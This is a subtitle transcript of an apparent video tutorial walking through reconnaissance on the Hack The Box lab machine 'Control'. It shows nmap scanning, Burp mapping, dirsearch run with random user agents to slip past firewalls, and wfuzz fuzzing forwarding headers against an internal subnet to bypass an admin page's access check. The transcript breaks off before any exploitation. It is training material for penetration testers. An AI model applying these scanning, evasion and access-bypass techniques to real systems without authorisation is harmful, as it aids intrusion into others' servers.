1
00:00:03,330 --> 00:00:09,810
OK, so now we're going to move into Control, right, this box. You're going to actually

2
00:00:09,810 --> 00:00:13,710
learn step by step everything from SQL injection, how it works manually.

3
00:00:13,950 --> 00:00:16,500
You're going to learn PowerShell 7.

4
00:00:17,070 --> 00:00:18,120
You're going to learn Khamal.

5
00:00:18,140 --> 00:00:23,940
You're going to learn, you know, the details of hacking and weaving it at the very end.

6
00:00:23,940 --> 00:00:27,570
We're going to look at the logs that are created in this attack once we've compromised the box.

7
00:00:27,570 --> 00:00:34,170
And once we pop it, you're going to actually see what would have been logged by a system like Splunk or

8
00:00:34,170 --> 00:00:37,560
ArcSight or ELK, an ELK stack like Kibana.

9
00:00:38,070 --> 00:00:42,840
So it's going to be very, very, very insightful to anyone that's wanting to get into penetration

10
00:00:42,840 --> 00:00:46,400
testing, red teaming, and you get to learn the entire flow from start to finish.

11
00:00:46,420 --> 00:00:47,610
So this is going to be really fun.

12
00:00:47,850 --> 00:00:50,850
Let's just go ahead and just create the directory.

13
00:00:51,040 --> 00:00:56,290
So let's go and create a directory called control and then we're going to cd into control.

14
00:00:57,300 --> 00:01:04,340
This just means if this side is true, sorry, if the left side is true, then the right side

15
00:01:04,350 --> 00:01:05,640
should be operated upon.

16
00:01:05,670 --> 00:01:09,390
So we're just basically joining both of these commands together.

17
00:01:10,650 --> 00:01:11,800
See, now we're in control.

18
00:01:12,180 --> 00:01:12,570
All right.

19
00:01:13,560 --> 00:01:14,640
So we've got nothing in here.

20
00:01:15,820 --> 00:01:16,750
Let's start tmux.

21
00:01:18,300 --> 00:01:18,570
All right.

22
00:01:18,570 --> 00:01:26,280
So we're going to go ahead and name this tab, control a comma, name it VPN, and then sudo openvpn.

23
00:01:26,790 --> 00:01:30,090
And we're just basically pointing the config to our VPN file.

24
00:01:34,910 --> 00:01:43,220
All right, so we are connected to the VPN, right, so control a c, control a comma, recon, and let's

25
00:01:43,220 --> 00:01:48,370
just do target equals, and let's just save the IP address as a variable named target.

26
00:01:49,790 --> 00:01:53,870
And then what we can do is we can do sudo ping -c.

27
00:01:54,710 --> 00:01:59,960
I want to count four pings; if you leave this off, it'll just ping forever. And then $target, meaning

28
00:01:59,960 --> 00:02:03,640
we'll put the IP address in place of the variable name.

29
00:02:04,130 --> 00:02:06,050
We just want to make sure the target's active.

30
00:02:06,400 --> 00:02:11,240
Of course the target can be active even if it doesn't respond to Ping, but this is just one good test

31
00:02:11,240 --> 00:02:11,660
you can do.

32
00:02:11,870 --> 00:02:17,630
And of course, if the TTL is less than 128 but greater than 64, it's most likely a Windows box.

33
00:02:18,920 --> 00:02:24,500
So this is a pro tip, because you can discover the operating system of a target machine just by pinging

34
00:02:24,500 --> 00:02:25,670
it in many cases.

35
00:02:26,680 --> 00:02:27,950
So keep that in mind.

36
00:02:28,430 --> 00:02:30,380
Let's go ahead and run nmap against it.

37
00:02:32,090 --> 00:02:33,440
Let me explain what's happening here.

38
00:02:33,950 --> 00:02:36,980
So we're running nmap with root privileges because then we get more data.

39
00:02:37,970 --> 00:02:43,570
Verbose means that as nmap discovers open ports, it will display them.

40
00:02:43,580 --> 00:02:44,600
We won't have to finish.

41
00:02:44,630 --> 00:02:47,720
We won't have to wait until nmap finishes before we see the results.

42
00:02:47,720 --> 00:02:49,520
We'll see the results as they're being discovered.

43
00:02:50,750 --> 00:02:53,300
-Pn means don't bother pinging it.

44
00:02:53,540 --> 00:02:54,650
Just assume it's active.

45
00:02:55,460 --> 00:02:58,430
-T5 is the most aggressive scan.

46
00:02:58,730 --> 00:03:03,800
T3 is usually what we would use in a real engagement because T5, if the box is weak, you might just

47
00:03:03,800 --> 00:03:06,980
knock it over from inundating it with so many packets.

48
00:03:07,430 --> 00:03:11,390
But since this is Hack The Box and it's a live environment, T5 should be OK.

49
00:03:12,320 --> 00:03:13,730
-sC means run default scripts.

50
00:03:13,730 --> 00:03:16,510
Don't run any scripts that are going to run live

51
00:03:16,520 --> 00:03:22,100
exploits against the box. Again, nmap is kind of like Nessus, or like a typical vulnerability scanner.

52
00:03:22,430 --> 00:03:27,340
There are scripts that can run checks and, in some cases, attacks on the target.

53
00:03:27,350 --> 00:03:30,710
So you want to make sure that you don't run any target.

54
00:03:30,710 --> 00:03:35,930
You don't want any scripts that can potentially knock the box offline or cause it to reboot.

55
00:03:37,310 --> 00:03:39,020
And then the dash s...

56
00:03:39,260 --> 00:03:43,100
Sorry, -sV, V as in the movie, means do the version checks.

57
00:03:44,030 --> 00:03:48,770
So what I did was actually just concatenated two different flags together in one flag.

58
00:03:50,120 --> 00:03:56,420
And this is really cool because nmap has the ability to identify a service that's running on a non-standard

59
00:03:56,420 --> 00:03:56,780
port.

60
00:03:57,080 --> 00:03:57,350
Right.

61
00:03:57,370 --> 00:04:04,700
So if you have, for example, FTP running on port 25, you know, it might be smart enough to know

62
00:04:04,700 --> 00:04:10,310
that you're not running SMTP because it runs a series of checks against that port to do everything it

63
00:04:10,310 --> 00:04:15,230
can to ascertain what service really resides on that port.

64
00:04:15,230 --> 00:04:18,200
And it's kind of detailed how it does it, but it really does do it.

65
00:04:18,210 --> 00:04:21,080
I've done some testing here and it's really amazing how nmap works.

66
00:04:22,610 --> 00:04:23,780
That's -oN.

67
00:04:25,020 --> 00:04:29,030
It means you want the output to be stored in the nmap file, which

68
00:04:29,030 --> 00:04:31,060
is just a file that saves the output.

69
00:04:31,940 --> 00:04:37,550
This -p0-65535 means you want to scan all ports from port zero to six five five

70
00:04:37,550 --> 00:04:38,090
three five.

71
00:04:38,630 --> 00:04:46,070
A lot of times people will put in -p- like this, and that scans ports one to six five five three

72
00:04:46,070 --> 00:04:47,420
five, but it misses port zero.

73
00:04:48,140 --> 00:04:54,620
So putting in this full port range gets port zero as well, because sometimes it will show up.

74
00:04:54,770 --> 00:04:59,510
So that's another tip that you can use. Then --reason: you want the reason to be displayed if the port's

75
00:04:59,510 --> 00:05:03,770
blocked, and then finally the target, which is a variable for the IP address.

76
00:05:05,270 --> 00:05:05,670
Here we go.

77
00:05:05,690 --> 00:05:10,880
We're off to the races, and while nmap is scanning, you can always press the space bar key to get an

78
00:05:10,880 --> 00:05:12,230
update about its progress.

79
00:05:14,420 --> 00:05:14,750
All right.

80
00:05:14,750 --> 00:05:19,070
So as it scans, let's just go investigate, because we can see that RPC is listening.

81
00:05:19,100 --> 00:05:25,040
This is MySQL, and this is port 80. Port 80 typically has the broadest attack

82
00:05:25,040 --> 00:05:25,400
surface.

83
00:05:25,400 --> 00:05:28,910
We should start with the Web and I'm not even sure what this port is.

84
00:05:29,810 --> 00:05:35,750
So we'll create a new pane: control a c, control a comma, discovery.

85
00:05:36,950 --> 00:05:39,740
And let's just open up a browser.

86
00:05:41,570 --> 00:05:47,660
And open up Burp as well, so we can passively spider the host as we poke around the page.

87
00:05:49,980 --> 00:05:52,290
So I'm going to go ahead and select Burp from here.

88
00:06:03,500 --> 00:06:04,460
All right, sweet.

89
00:06:04,580 --> 00:06:12,160
So let's look at the options, control shift options, and I just want to make sure that the server responses

90
00:06:12,180 --> 00:06:13,160
are also intercepted.

91
00:06:15,130 --> 00:06:20,350
Let's go back to intercept and let's take intercept off; it's just going to filter all the traffic

92
00:06:20,350 --> 00:06:22,330
through Burp so I can build out this target tab.

93
00:06:23,670 --> 00:06:26,440
You can build out a site map while we browse.

94
00:06:32,190 --> 00:06:36,660
The page is loaded and we can just, you know, scroll through it. The title's Fidelity, I don't know

95
00:06:36,660 --> 00:06:37,440
what that means.

96
00:06:38,100 --> 00:06:39,870
You know, it says the future has landed.

97
00:06:40,820 --> 00:06:41,960
Who knows what that means?

98
00:06:42,390 --> 00:06:47,130
You know, we could try SQL injection testing, testing for SQL injection by putting a single tick

99
00:06:47,760 --> 00:06:48,030
back.

100
00:06:48,120 --> 00:06:49,470
Just takes it to the top of the page.

101
00:06:50,160 --> 00:06:52,170
You can actually tell that by this anchor tag.

102
00:06:53,130 --> 00:06:56,900
I mean, all these links down here look like they don't really go anywhere.

103
00:06:57,690 --> 00:06:58,730
We don't have a copyright date.

104
00:06:58,740 --> 00:07:02,730
Sometimes you can find if there's a copyright date down here that's like, you know, in the past,

105
00:07:02,940 --> 00:07:04,830
then you can search for exploits against it.

106
00:07:05,250 --> 00:07:08,160
But we could see, you know, just running WordPress or something similar.

107
00:07:08,970 --> 00:07:13,050
There's also an admin page and a login portal.

108
00:07:13,050 --> 00:07:14,520
So we press Control-U.

109
00:07:15,450 --> 00:07:24,630
We get the source. Control-F lets you search for like cred or key or pass or salt.

110
00:07:26,230 --> 00:07:27,270
We look for comments.

111
00:07:28,450 --> 00:07:31,680
So right away we see this comment here.

112
00:07:32,170 --> 00:07:37,140
Looks like the developer left a to-do list inside of the source code that basically says, you know,

113
00:07:37,140 --> 00:07:40,200
we need to import products and we need to link to a new payment system.

114
00:07:40,500 --> 00:07:45,540
And it gives us an internal IP, which is interesting.

115
00:07:45,540 --> 00:07:45,750
Right.

116
00:07:45,770 --> 00:07:47,850
So this would be a finding, right.

117
00:07:47,860 --> 00:07:54,720
So what we actually would do is we do control I think it's control print screen or is it control shift

118
00:07:54,720 --> 00:07:55,320
print screen.

119
00:07:56,070 --> 00:07:57,420
Yeah, control just print screen.

120
00:07:57,930 --> 00:08:02,220
And then you would grab this and put it in a report to the client.

121
00:08:04,720 --> 00:08:06,640
But yeah, so that's really interesting.

122
00:08:07,000 --> 00:08:12,970
We could keep looking for other comments, we could also look for like JavaScript.

123
00:08:15,470 --> 00:08:19,670
And we can go through all of these if we wanted to, but let's look at what Burp found.

124
00:08:22,130 --> 00:08:25,760
So we've already got some stuff; here is a site map.

125
00:08:27,840 --> 00:08:28,920
And.

126
00:08:30,910 --> 00:08:38,530
You can see there's some JavaScript files, there's some CSS, and there's a bunch of other things.

127
00:08:38,860 --> 00:08:43,300
So what I like to do is I like to right-click and "Add to scope" and then click inside of here and

128
00:08:43,300 --> 00:08:44,740
say "Show only in-scope items".

129
00:08:44,740 --> 00:08:49,840
That way, if I'm browsing Google or Facebook or whatever else I'm browsing, that's not going to filter

130
00:08:49,840 --> 00:08:50,560
into the sitemap.

131
00:08:50,560 --> 00:08:53,840
I'm only going to see what's relevant to this particular target.

132
00:08:54,280 --> 00:08:59,500
In addition, if you look in the bottom right here, you can see that this is powered by 7.3.7 and

133
00:08:59,500 --> 00:09:00,880
it looks like it's running IIS 10.

134
00:09:01,660 --> 00:09:06,850
Now, IIS 10 can either be Windows 10, Windows 2016 or Windows 2019, we don't

135
00:09:06,850 --> 00:09:07,150
know.

136
00:09:07,750 --> 00:09:12,250
But it's running on Windows, which is interesting because most Windows applications are running.

137
00:09:13,630 --> 00:09:19,250
You would expect, you know, something other than one of the things that's really interesting about

138
00:09:19,250 --> 00:09:20,050
this target already.

139
00:09:20,080 --> 00:09:22,450
I can tell you is that it's running MySQL.

140
00:09:22,450 --> 00:09:26,020
So if we go back here, let's go back to nmap, tab one.

141
00:09:26,710 --> 00:09:30,880
But it's running MySQL, not Microsoft SQL Server.

142
00:09:30,880 --> 00:09:35,050
So this is an interesting stack, security stack and interesting configuration.

143
00:09:35,050 --> 00:09:38,610
And we're probably going to find some interesting things through this engagement.

144
00:09:39,850 --> 00:09:42,490
So let's go back to the page.

145
00:09:43,190 --> 00:09:44,410
Let's just go to admin.

146
00:09:46,230 --> 00:09:51,720
And it gives us an interesting message: Access denied, header missing, please ensure you go through

147
00:09:51,930 --> 00:09:53,790
the proxy to access this page.

148
00:09:54,220 --> 00:10:01,080
So it almost appears that this web application is implementing access control via a custom

149
00:10:01,440 --> 00:10:05,130
HTTP header, which currently isn't present.

150
00:10:05,130 --> 00:10:07,790
And therefore, I wasn't granted access to this admin page.

151
00:10:07,800 --> 00:10:10,860
So if we knew what that header combination was, we might be able to gain access to this.

152
00:10:12,240 --> 00:10:13,840
Now, before we figure this out.

153
00:10:13,860 --> 00:10:15,890
Let's go ahead and have something running in the background.

154
00:10:16,680 --> 00:10:18,870
So we've already got nmap running in the background, and it's still running.

155
00:10:18,870 --> 00:10:24,330
I can press spacebar to check on it; looks like it's almost 60 percent done, but we can run some discovery.

156
00:10:24,330 --> 00:10:27,150
So, control a, let's run dirsearch.

157
00:10:39,480 --> 00:10:47,340
Control a shift double quote, control a, hold down control, press down, and then in its bottom pane

158
00:10:47,340 --> 00:10:50,830
we can type sudo /opt/dirsearch.

159
00:10:50,870 --> 00:10:52,430
I'm going to explain everything that happens here.

160
00:10:52,440 --> 00:10:56,840
So we're starting with dirsearch. Where did I get dirsearch?

161
00:10:57,090 --> 00:10:57,750
I just Googled.

162
00:10:57,840 --> 00:10:59,160
Right, so you can go to Google.

163
00:11:01,900 --> 00:11:05,960
And first thing, we take off Burp.

164
00:11:08,390 --> 00:11:09,950
dirsearch GitHub.

165
00:11:12,520 --> 00:11:13,300
This right here, right?

166
00:11:16,000 --> 00:11:24,430
And then you can just go git clone, copy, and then all I did was I just went into the opt directory

167
00:11:25,420 --> 00:11:26,650
and then ran git clone.

168
00:11:26,650 --> 00:11:37,690
So literally all I did was I went here and went to /opt, sudo git clone, and then put in the

169
00:11:37,690 --> 00:11:41,200
GitHub repository path and dot to basically save it there.

170
00:11:41,740 --> 00:11:44,980
When you do that, you have it. Control-U to delete it.

171
00:11:45,590 --> 00:11:55,900
And let's go back up and get the help. Control a left bracket, page up, page up and down a little

172
00:11:55,900 --> 00:11:56,060
bit.

173
00:11:56,060 --> 00:11:59,380
So now we can investigate what we can do with this awesome tool.

174
00:12:01,960 --> 00:12:07,120
So what we're doing first is we want -u, the URL, right, the target.

175
00:12:07,690 --> 00:12:12,070
So technically, what we could do here is we could control, control, control, control left.

176
00:12:12,490 --> 00:12:16,530
I can just put in http://$target.

177
00:12:17,290 --> 00:12:20,950
Actually, that won't work because the variable is session specific.

178
00:12:21,130 --> 00:12:25,900
And so if I go up here, plus page down, page down, I say echo.

179
00:12:27,370 --> 00:12:29,570
I go $target.

180
00:12:30,400 --> 00:12:31,260
Nothing happens, right?

181
00:12:31,780 --> 00:12:35,770
That's because it was saved in the previous pane, this one.

182
00:12:36,780 --> 00:12:37,880
Which now, nmap is finished.

183
00:12:37,950 --> 00:12:40,320
When I go here, $target, you'll see it.

184
00:12:41,400 --> 00:12:46,170
So what we could do is we could just go down here, we could save it, but we don't need to just put

185
00:12:46,170 --> 00:12:46,770
in the address.

186
00:12:50,470 --> 00:12:52,150
So we're saying scan this target

187
00:12:55,060 --> 00:13:05,680
dash dash, at all, yeah, that's, anyway, capital E means that we want to do a search for common extensions,

188
00:13:05,680 --> 00:13:07,950
right, use a predefined list of common extensions.

189
00:13:07,960 --> 00:13:09,760
We know there's but there may be others.

190
00:13:10,520 --> 00:13:12,630
Technically, we could just do a dash e space.

191
00:13:14,620 --> 00:13:18,550
But we're just going to include some common extensions so we can have a little bit more of a verbose

192
00:13:18,550 --> 00:13:21,670
of a scan. 50 threads.

193
00:13:22,600 --> 00:13:23,890
You know, I usually start with 50.

194
00:13:23,890 --> 00:13:28,210
Sometimes if you put too many threads against a vulnerable web server or a web server that's under-resourced,

195
00:13:28,210 --> 00:13:30,370
it could just crash or reboot.

196
00:13:30,970 --> 00:13:31,990
That's not what you want.

197
00:13:33,010 --> 00:13:36,070
So we'll just keep the thread, the thread count relatively low.

198
00:13:39,830 --> 00:13:44,570
And then the other thing I'd like to do is I'd like to put random user agents in the scanner, you know,

199
00:13:44,570 --> 00:13:51,620
sometimes if, you know, the target is running some kind of Web application firewall or something similar,

200
00:13:52,220 --> 00:13:57,380
if it sees the scan coming from a non-browser, in other words, the user agent just shows dirsearch,

201
00:13:57,830 --> 00:13:58,870
and it might just block that.

202
00:13:59,030 --> 00:14:01,640
It might just block the scan activity, the recon activity.

203
00:14:01,670 --> 00:14:05,330
So here we're just going to use a bunch of random user agents as it's scanning.

204
00:14:06,260 --> 00:14:12,890
And then we're going to output the report to this file called Dirceu to e-mail.

205
00:14:12,890 --> 00:14:14,390
And then we're just going to use this word list.

206
00:14:16,390 --> 00:14:18,400
Which is a common wordlist that's included with Kali.

207
00:14:19,810 --> 00:14:20,710
Hopefully that makes sense.

208
00:14:21,040 --> 00:14:26,800
So I'm just going to go ahead and make sure I'm in the bottom pane by pressing control a down arrow

209
00:14:26,800 --> 00:14:29,140
and then press enter, entering the password.

210
00:14:29,140 --> 00:14:31,570
And let's go to go up.

211
00:14:33,460 --> 00:14:34,210
Going to exit the top.

212
00:14:35,170 --> 00:14:35,450
All right.

213
00:14:35,470 --> 00:14:39,940
So now we've got some recon going on in the background and nmap is finished.

214
00:14:39,940 --> 00:14:40,340
Finished.

215
00:14:40,360 --> 00:14:45,910
If we do cat control.nmap, we should see the file.

216
00:14:47,200 --> 00:14:48,640
So already we can see a couple of things, right.

217
00:14:49,600 --> 00:14:52,480
Port 80, we knew that was running Microsoft

218
00:14:52,480 --> 00:14:53,020
IIS.

219
00:14:54,010 --> 00:14:58,530
And here are some scripts that ran; it determined that these methods are supported.

220
00:14:58,570 --> 00:14:59,290
This is nothing big.

221
00:14:59,290 --> 00:15:00,010
I see this a lot.

222
00:15:00,400 --> 00:15:03,070
And it's just showing that, you know, these are the methods that are supported.

223
00:15:03,070 --> 00:15:06,160
TRACE in particular can potentially be a vulnerability.

224
00:15:06,160 --> 00:15:07,300
But it isn't in this case.

225
00:15:08,440 --> 00:15:15,430
And this is just, again, the server name. Fidelity is the title of the webpage, which we saw when

226
00:15:15,430 --> 00:15:20,020
we went back to this page here, in the tab bar. And 135,

227
00:15:20,020 --> 00:15:22,780
This is Microsoft Windows RPC Remote Procedure Call.

228
00:15:22,780 --> 00:15:26,590
this is a legacy port that's usually open on all Windows boxes, very small attacks.

229
00:15:26,590 --> 00:15:29,320
3306 is MySQL.

230
00:15:29,320 --> 00:15:34,690
And you can see here it actually tried to connect, but it wasn't allowed to connect.

231
00:15:34,780 --> 00:15:36,460
For example, if I do this: mysql.

232
00:15:39,240 --> 00:15:43,200
And I do -h and I put 10.10.10.167.

233
00:15:45,860 --> 00:15:46,370
Look at that.

234
00:15:46,530 --> 00:15:51,380
See, the error message I got is not allowed to connect to this MariaDB server. MariaDB, by the way,

235
00:15:51,380 --> 00:15:52,510
is another name for MySQL.

236
00:15:53,480 --> 00:15:55,270
You can see that same error message up here.

237
00:15:55,880 --> 00:15:59,810
So it literally just tried to do what we did and it got the same message back. Then

238
00:15:59,810 --> 00:16:02,780
we have a few high-level ports and that's really it.

239
00:16:03,410 --> 00:16:06,800
OK, and if you go back to discovery, you can see this is still running.

240
00:16:07,250 --> 00:16:15,170
So let's go back to the Web page and look at this custom header and then maybe we can Google some custom

241
00:16:15,170 --> 00:16:15,500
headers.

242
00:16:15,500 --> 00:16:15,740
Right?

243
00:16:16,280 --> 00:16:16,970
So we go to Google.

244
00:16:18,040 --> 00:16:18,740
What type?

245
00:16:19,070 --> 00:16:19,880
What should we Google?

246
00:16:20,450 --> 00:16:28,190
Well, we can say like header proxy, maybe HTTP header proxy.

247
00:16:28,220 --> 00:16:31,550
Let's try that: HTTP header proxy.

248
00:16:34,000 --> 00:16:34,900
Click the first link.

249
00:16:36,480 --> 00:16:41,460
And see what we've got, that's just type everything for oops.

250
00:16:44,010 --> 00:16:44,930
That's what I did there.

251
00:16:45,750 --> 00:16:51,150
Control F, I'm going to search for proxy and just go down the list to find something, proxies.

252
00:16:51,300 --> 00:16:51,480
Yeah.

253
00:16:51,490 --> 00:16:51,940
Here we go.

254
00:16:53,220 --> 00:16:57,390
So here are some headers that we can add to a wordlist.

255
00:16:57,390 --> 00:17:04,140
The idea here is I want to try to fuzz these fields to see if I can find a header that will grant me

256
00:17:04,140 --> 00:17:05,460
access to this admin portal.

257
00:17:06,940 --> 00:17:14,760
So control a c, control a comma, fuzz, and we'll create a new file: sudo vim headers.txt.

258
00:17:18,300 --> 00:17:19,800
I control be.

259
00:17:21,760 --> 00:17:31,180
Interesting. Control, there we go. Escape, go to the top, dd to delete, down arrow, dd delete line, down

260
00:17:31,180 --> 00:17:35,290
arrow, dd delete line, down arrow, dd delete line, and so on.

261
00:17:35,830 --> 00:17:42,310
Then escape, wq, cat headers to see the file, just to make sure it's there, and it is. Now we're going

262
00:17:42,310 --> 00:17:46,510
to use wfuzz to find some fields here.

263
00:17:47,740 --> 00:17:54,100
So again, I'd like to split the panes, control a shift, double quote, control a hold down control

264
00:17:54,100 --> 00:17:55,090
while I press the down arrow.

265
00:17:55,840 --> 00:17:59,260
I like to use the bottom pane to build out my command and the top pane to look at the help file.

266
00:18:00,730 --> 00:18:04,210
I find this very useful in running these tools.

267
00:18:06,680 --> 00:18:08,210
All right, so what are we doing here?

268
00:18:10,400 --> 00:18:13,220
I just pressed the right arrow key to autocomplete this.

269
00:18:13,250 --> 00:18:14,830
So let me let me explain what's happening here.

270
00:18:16,990 --> 00:18:25,030
First, we have dash c, c is for colors, I like colors. Verbose, that's what the dash v is.

271
00:18:25,600 --> 00:18:28,210
OK, dash t, again, you probably can guess this.

272
00:18:28,830 --> 00:18:30,070
What do you think dash t stands for?

273
00:18:30,580 --> 00:18:35,590
It's the threads, or the number of concurrent connections; ten is default.

274
00:18:35,620 --> 00:18:36,400
We're doing 50.

275
00:18:37,660 --> 00:18:39,910
Then we need a wordlist.

276
00:18:42,160 --> 00:18:48,040
Actually, we need the URL, so I've got the URL here as well right here, and we're fuzzing specifically

277
00:18:48,040 --> 00:18:54,730
this endpoint, this admin file, the admin endpoint, because that's where we saw that

278
00:18:55,240 --> 00:18:58,480
message. Control... because that's what we saw.

279
00:18:59,200 --> 00:19:01,630
And what else do we need?

280
00:19:01,630 --> 00:19:03,550
We need the header, dash H.

281
00:19:04,480 --> 00:19:12,220
If you look in the help, you'll see that the header looks like it's this format, so we can put FUZZ

282
00:19:12,220 --> 00:19:12,550
anywhere.

283
00:19:12,550 --> 00:19:16,330
We want to replace a name with something from our word list.

284
00:19:16,930 --> 00:19:17,180
Right.

285
00:19:17,250 --> 00:19:26,320
So I want to fuzz this value, so we can go back down here, we can type FUZZ and we'll just put one

286
00:19:26,560 --> 00:19:30,910
seven zero zero one and you'll see what's happening in a moment.

287
00:19:30,940 --> 00:19:34,830
Watch what happens when I press control a z.

288
00:19:35,350 --> 00:19:37,870
So you can see here we're actually getting a 200 response for everything.

289
00:19:38,260 --> 00:19:38,880
What's going on?

290
00:19:38,890 --> 00:19:41,650
We need to probably filter this through a proxy so we can investigate.

291
00:19:44,510 --> 00:19:46,880
Control a left bracket, slash proxy.

292
00:19:49,250 --> 00:19:58,310
And if we do dash p, we could put a proxy in this format, and view it if you go to Burp, control shift p.

293
00:20:00,190 --> 00:20:08,500
You can see we're listening on localhost 8080, so it's 127.0.0.1, that's the IP.

294
00:20:10,110 --> 00:20:15,090
Then we have port 8080, and then we have a type:

295
00:20:17,650 --> 00:20:24,610
HTTP, right. Go back to Burp, control shift p, intercept, to make sure this is on.

296
00:20:25,980 --> 00:20:26,790
And then press enter.

297
00:20:29,910 --> 00:20:36,150
All right, so you notice, you could see here's wfuzz and here's the header.

298
00:20:37,260 --> 00:20:39,330
That came from our headers file, right?

299
00:20:39,450 --> 00:20:40,380
Was the first one on the list.

300
00:20:41,070 --> 00:20:48,540
Do control a shift double quote, cat headers.txt, control a z to make it big.

301
00:20:50,230 --> 00:20:52,950
Looks like Forwarded was not the first one on the list, X-Forwarded-Host.

302
00:20:53,700 --> 00:20:54,870
So it's doing this one right now.

303
00:20:55,890 --> 00:20:59,190
And we click forward, doing X-Forwarded-For.

304
00:21:00,570 --> 00:21:05,970
And then we go forward again and stepping forward it so I'm guessing the next one's going to be the.

305
00:21:08,370 --> 00:21:13,740
OK, well, it's not, but it is another header inside of our list, X-Forwarded-Proto.

306
00:21:15,430 --> 00:21:20,440
And this is probably the media, so it looks like it's randomly selecting it, but the point

307
00:21:20,440 --> 00:21:22,690
here is that it's working.

308
00:21:22,720 --> 00:21:25,510
I mean, the thing, the request, but we're getting 200 for everything.

309
00:21:25,930 --> 00:21:27,720
I'm not seeing the response for some reason.

310
00:21:30,740 --> 00:21:31,670
I am seeing the response.

311
00:21:31,710 --> 00:21:32,530
It is a response.

312
00:21:32,570 --> 00:21:38,870
OK, so let's go back over here and let's think about this.

313
00:21:39,510 --> 00:21:40,130
Let's see.

314
00:21:42,140 --> 00:21:43,430
Let's take off this proxy bit.

315
00:21:45,370 --> 00:21:49,510
And let's also fuzz the IP address.

316
00:21:50,790 --> 00:21:56,430
So we could put in, well, let's just put in the IP address of the server, 10.10.10.167.

317
00:22:00,760 --> 00:22:06,200
Same problem, 200s. Control a z to get back out.

318
00:22:06,550 --> 00:22:08,650
Up, up, up, up, up, up, up, up, up, up, up.

319
00:22:10,450 --> 00:22:19,270
So if we go back to the source code of this web app, let's go back, control u.

320
00:22:21,680 --> 00:22:26,480
You'll see it has its IP, this IP in the 192.168 network.

321
00:22:29,770 --> 00:22:38,440
So what we probably want to do is we want to iterate. We could use this IP here as the IP in the header, or

322
00:22:38,440 --> 00:22:44,020
we could create a Python script or Bash script or something and just sort of print out all the hosts

323
00:22:44,020 --> 00:22:50,020
in that 192.168.4.0 subnet and see if we can just test all those against all the combinations of

324
00:22:50,020 --> 00:22:58,300
HTTP request headers and see which one gives us a different result than what we're seeing now.

325
00:22:59,230 --> 00:22:59,590
Right.

326
00:23:00,730 --> 00:23:01,970
So let me show you what I mean.

327
00:23:01,990 --> 00:23:03,910
So first, let's see if we can use Python to do this.

328
00:23:04,510 --> 00:23:12,230
Create a new tab, Ctrl+A C, cd control, python3.

329
00:23:13,030 --> 00:23:13,840
So if we say like.

330
00:23:15,370 --> 00:23:26,290
Let's see, from ipaddress import ip_network, and we can say for ip in ip_network(

331
00:23:29,050 --> 00:23:32,590
'192.168.4.0/24')

332
00:23:33,880 --> 00:23:43,600
colon, tab, print(ip). Before we press enter, just to let you know, we're importing this ip_network function

333
00:23:44,200 --> 00:23:48,970
from this particular library, and then we're saying every time you loop, we're going to create a loop

334
00:23:49,630 --> 00:23:56,440
and we're going to loop through each host in the 192.168.4.0 network.

335
00:23:56,740 --> 00:23:58,020
So this is a 24-bit mask.

336
00:23:58,030 --> 00:24:00,820
So it's actually 255.255.255.0.

337
00:24:00,820 --> 00:24:01,120
Right.

338
00:24:01,880 --> 00:24:04,280
It's going to go 192.168.4.1.

339
00:24:04,300 --> 00:24:05,080
It's going to point that out.

340
00:24:05,380 --> 00:24:08,050
That's going to be the IP the first time through second time through.

341
00:24:08,050 --> 00:24:10,810
It's going to be 192.168.4.2.

342
00:24:11,230 --> 00:24:11,530
Right.

343
00:24:11,740 --> 00:24:12,340
Print that out.

344
00:24:12,340 --> 00:24:14,740
And so on and so forth until you get to 255.

345
00:24:15,310 --> 00:24:18,010
So if this works and it does, we have what we need.

346
00:24:18,880 --> 00:24:22,120
So let's go ahead and create a script.

347
00:24:23,560 --> 00:24:26,050
Before we do that, we want to make sure we use the right version of Python.

348
00:24:26,680 --> 00:24:27,370
The location.

349
00:24:28,450 --> 00:24:30,100
You'll see why I'm doing this in a second.

350
00:24:31,300 --> 00:24:37,800
sudo vim, let's call it ips.txt.

351
00:24:39,410 --> 00:24:40,870
Oh, I'm sorry, what am I doing?

352
00:24:42,320 --> 00:24:43,160
It's not what we're doing here.

353
00:24:45,050 --> 00:24:46,430
We're doing what we're doing here.

354
00:24:46,460 --> 00:24:51,740
We're creating ips.py: sudo vim ips.py.

355
00:24:53,470 --> 00:24:54,700
ips.py.

356
00:24:58,210 --> 00:25:05,170
All right, so I'm going to do a shebang at the top, and that just tells the bash shell

357
00:25:05,320 --> 00:25:07,090
that what we're executing is a Python script.

358
00:25:07,360 --> 00:25:11,800
So we can say from ipaddress import ip_network.

359
00:25:15,640 --> 00:25:25,930
for ip in ip_network('192.168.4.0/24'), sorry, colon, and then we could just do print(ip).

360
00:25:27,710 --> 00:25:38,930
Escape, :wq, sudo chmod +x, make it executable, and then ls -lh on ips.py, we should

361
00:25:38,930 --> 00:25:43,130
see that it is now executable by everyone, right?

362
00:25:43,730 --> 00:25:44,570
Anyone can run it.

363
00:25:45,440 --> 00:25:48,630
Anyone in the group can run it and root himself can run it.

364
00:25:49,790 --> 00:25:57,500
So if we just ran it, let's see, it runs, right?

365
00:25:58,070 --> 00:25:59,120
So let's scrap this whole thing.

366
00:25:59,570 --> 00:26:03,410
Space, page up, page up, page up.

367
00:26:03,680 --> 00:26:04,400
Page down.

368
00:26:05,210 --> 00:26:05,510
Right.

369
00:26:06,090 --> 00:26:07,190
Let's go right here.

370
00:26:07,190 --> 00:26:08,150
And we're going to press.

371
00:26:09,410 --> 00:26:21,530
Enter, sudo vim ips.txt, i, Ctrl+A ], escape, Shift-colon wq, cat ips.txt to

372
00:26:21,530 --> 00:26:22,250
make sure it's there.

373
00:26:23,580 --> 00:26:31,980
ips.txt is there, sweet, so we can now go back to the first tab and continue to build our

374
00:26:31,980 --> 00:26:32,380
query.

375
00:26:32,940 --> 00:26:36,660
Now what we're going to do, in addition to the headers, remember what we're doing, Shift-

376
00:26:37,900 --> 00:26:40,210
-w headers.txt.

377
00:26:42,470 --> 00:26:45,080
Right, autocomplete. We're now going to also do

378
00:26:48,840 --> 00:26:55,560
these IPs, right, so let's close this out, we can say a second wordlist,

379
00:26:57,540 --> 00:27:00,940
and we're going to put in ips.txt,

380
00:27:03,600 --> 00:27:10,860
instead of having this 10.10.10.167 static IP, we're going to do a second one, FUZ2Z.

381
00:27:11,400 --> 00:27:12,270
How did I know to do that?

382
00:27:12,540 --> 00:27:20,430
Because if I go up here, Ctrl+A [, page up, page up, you'll see this:

383
00:27:22,110 --> 00:27:25,530
FUZnZ, where n is a variable for a number.

384
00:27:25,770 --> 00:27:29,670
